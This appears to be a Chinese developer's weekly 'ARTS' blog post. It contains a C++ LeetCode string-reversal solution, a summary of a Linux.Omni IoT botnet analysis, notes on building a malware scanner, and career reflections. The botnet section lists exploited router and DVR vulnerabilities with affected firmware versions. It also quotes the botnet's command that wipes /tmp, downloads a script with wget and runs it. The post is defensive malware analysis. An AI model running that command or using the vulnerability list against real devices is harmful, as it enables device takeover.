【ARTS】01_06_左耳听风-20181217~1223
ARTS:
- Algrothm: leetcode算法题目
- Review: 阅读并且点评一篇英文技术文章
- Tip/Techni: 学习一个技术技巧
- Share: 分享一篇有观点和思考的技术文章
Algorithm
【leetcode】Reverse String
https://leetcode.com/problems/reverse-string/
1)problem
编写一个以字符串作为输入并逆转字符串的函数。
2)answer
字符串大于0,就从最末尾开始取值。
3)solution
#include "pch.h"
#include <stdio.h>
#include <string>
#include <iostream>
#include <algorithm>
using std::string;
class Solution {
public:
string reverseString(string s) {
string result = "";
for (int i =s.length()-1;i>=0 ; i--)
{
result += s.at(i);
}
return result;
}
};
int main()
{
// 使用内容
Solution nSolution;
nSolution.reverseString("abcdef");
}
Review
【漏洞挖掘】Linux.Omni IoT 僵尸网络恶意软件分析
1)场景
Linux下针对IoT威胁的分类和分析。
2)问题难点
使用什么方式对IOT设备进行攻击。
3)解决问题的方法
Linux.Omni因其感染库包含了许多漏洞(总共11种)
4)方法细节
利用的IoT设备漏洞
- Vacron
VACRON网络录像机中"board.cgi"参数存在代码注入的漏洞。

- Netgear – CVE-2016-6277
通过对路由器“cgi-bin/”目录进行GET请求而进行的远程代码执行攻击。

- D-Link – OS-Command Injection via UPnP
IoTReaper使用的是hedwig.cgi参数cookie溢出的漏洞,Omni使用的则是UPnP端口漏洞。
Omni的POST请求如下:

我们可以找到对应的二进制命令:

存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。
- CCTV-DVR
与“/language/Swedish”资源相关联,允许远程执行代码。

- D-Link – HNAP
通过CAPTCHA绕过登录,并允许外部攻击者执行远程代码。

D-Link路由器有此漏洞的版本:
DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA
- TR-069 – SOAP
漏洞利用如下:

二进制中的指令:

- Huawei Router HG532 – Arbitrary Command Execution
在华为HG532路由器中,可以通过修改HTTP请求来利用配置文件验证错误的漏洞。

此漏洞已在分析Okiru/Satori僵尸网络的文章中(Analysis of Linux.Okiru)被检测及分析。
- Netgear – Setup.cgi RCE
Netgear路由器DGN1000 1.1.00.48固件中存在允许远程执行代码而无需事先验证的漏洞。

- Realtek SDK
使用Realtek SDK和miniigd守护程序的不同设备都存在通过UPnP SOAP接口的命令注入漏洞。

- GPON
GPON路由器的最新漏洞

5)总结
尽管攻击方式多种多样, 在受感染设备上运行的命令是一致的:
cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}
下载的文件是bash脚本,它依据受感染设备的不同构架来下载样本。

Tip
【安全开发】恶意代码检查工具1
1)场景
网络安全设备报警,某台机器中毒。
2)问题难点
如何快速找到机器里的恶意代码相关进程、文件。
3)解决思路
通过搜索国内外恶意代码公开的分析报告,分析样本,提取行为特征。
4)方法细节
逆向分析收集到的样本,然后提取规则:
文件规则:文件路径、Yara规则
注册表:注册表路径、子项、类型、值
内存:内存特征码、内存类型、内存保护属性、内存块大小范围
遍历内存代码:
【恶意代码】恶意代码代码特征提取
https://www.cnblogs.com//17bdw/p/10181207.html
5)总结
只需要搞懂两个知识点:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 结构体中RegionSize字段的含义。
Share
【业务能力】极客时间-左耳听风-开篇词1
1)场景
利用技术变现思路。
2)问题难点
在长时间加班情况下,如何保持学习。
3)解决思路
觉得还是要从头到尾看完一本书,不容易被分神。
白天工作回家就不想动了。
4)方法细节
【技术思路】极客时间-左耳听风-开篇词1
https://www.cnblogs.com/17bdw/p/10183216.html
5)总结
用技术变现:
独立思考
保持学习力、洞察力
寻找合适的环境
具备动手能力。
关注技术付费点
善于提升经验
输出价值观
朋友圈
拥有技术领导力
【ARTS】01_06_左耳听风-20181217~1223的更多相关文章
- 【ARTS】01_21_左耳听风-201900401~201900407
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
- 【ARTS】01_20_左耳听风-20190325~20190331
zz## ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 ...
- 【ARTS】01_19_左耳听风-20190318~20190324
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
- 【ARTS】01_18_左耳听风-20190311~20190317
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
- 【ARTS】01_17_左耳听风-20190304~20190310
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
- 【ARTS】01_16_左耳听风-20190225~20190303
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
- 【ARTS】01_14_左耳听风-20190211~20190217
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
- 【ARTS】01_10_左耳听风-20190114~20190120
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
- 【ARTS】01_09_左耳听风-20190107~20190113
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algo ...
随机推荐
- 第二个Sprint冲刺第三天(燃尽图)
- 团队伊始——DreamCatcher
我们的团队,队名是DreamCatcher,中文意思是追梦人,它是一首歌曲,所属专辑是<新世纪的曙光>. 这是一首很好听的歌曲,里面有一句歌词是: I'm a dream catcher ...
- 索引器 C#
概述 索引器允许类或结构的实例就像数组一样进行索引. 索引器类似于属性,不同之处在于它们的访问器采用参数. 在下面的示例中,定义了一个泛型类,并为其提供了简单的 get 和 set 访问器方法(作为分 ...
- delphi checklistbox用法
在Delphi中checklistbox中高亮选中(不论是否Checked)能够进行操作么?删除,上下移动等等 删除:CheckListBox.DeleteSelected; 上下移: CheckLi ...
- 【转】如何快速识别应用MOS管,几张图片就搞定了
三极管是流控型器件,MOS管是压控型器件,两者存在相似之处.三极管机可能经常用,但MOS管你用的可能较少.对于MOS管先抛出几个问题: 如何区分P-MOS和N-MOS: 如何区分MOS的G.D.S管脚 ...
- CF1110E Magic Stones(构造题)
这场CF怎么这么多构造题…… 题目链接:CF原网 洛谷 题目大意:给定两个长度为 $n$ 的序列 $c$ 和 $t$.每次我们可以对 $c_i(2\le i<n)$ 进行一次操作,也就是把 $c ...
- 【bzoj2434】 Noi2011—阿狸的打字机
http://www.lydsy.com/JudgeOnline/problem.php?id=2434 (题目链接) 题意 给出一个字符串,$P$表示输出,$B$表示退格.$m$组询问$(x,y)$ ...
- VS2017企业版本(安装包+key)+ .NET Reflector 9.0
关于VS2017安装的一点扩充说明(15.5):http://www.cnblogs.com/dunitian/p/8051985.html Key激活无需断网 Visual Studio 2017 ...
- ssm框架配置过程
1.pom.xml配置 1.1<build>标签中配置<plugins>和<resources>,即插件和资源文件 1.2 <properties>标签 ...
- CF679E Bear and Bad Powers of 42
一段时间不写线段树标记,有些生疏了 codeforces 679e Bear and Bad Powers of 42 - CHADLZX - 博客园 关键点是:42的次幂,在long long范围内 ...